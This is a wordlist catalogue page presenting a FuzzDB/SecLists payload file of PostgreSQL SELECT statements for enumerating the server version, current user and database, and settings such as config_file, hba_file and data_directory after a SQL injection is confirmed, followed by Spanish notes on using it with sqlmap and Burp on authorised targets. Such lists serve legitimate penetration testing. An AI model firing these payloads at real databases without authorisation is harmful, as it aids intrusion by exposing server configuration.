PostgreSQL Enumeration (FuzzDB)

# info disclosure payload fuzzfile for pgsql select version(); select current_database(); select current_user; select session_user; select current_setting('log_connections'); select current_setting('log_statement'); select current_setting('port'); select current_setting('password_encryption'); select current_setting('krb_server_keyfile'); select current_setting('virtual_host'); select current_setting('port'); select current_setting('config_file'); select current_setting('hba_file'); select current_setting('data_directory');

Sentencias SELECT de divulgación de información de PostgreSQL para enumerar la versión, el usuario/base de datos actual y la configuración del servidor una vez confirmada la inyección. Útil tras la detección en back ends de Postgres.

Esta lista está orientada al fuzzing de entradas y el descubrimiento de vulnerabilidades. Contiene aproximadamente 693 B y funciona bien con herramientas como sqlmap, burp. Elige la lista más pequeña que se ajuste a tu engagement: las listas más cortas son más rápidas y silenciosas para los ataques en línea, mientras que las listas más grandes ofrecen mayor cobertura para el trabajo offline donde la velocidad es menos determinante.

Puedes copiar la vista previa de muestra directamente desde esta página, copiar la lista completa a tu portapapeles o descargar el archivo .txt sin procesar. La lista completa se sirve directamente desde su fuente original en GitHub.

Obtenida de danielmiessler/SecLists y distribuida bajo MIT. Utiliza wordlists únicamente contra sistemas para los que tengas autorización explícita de prueba.

Vista previa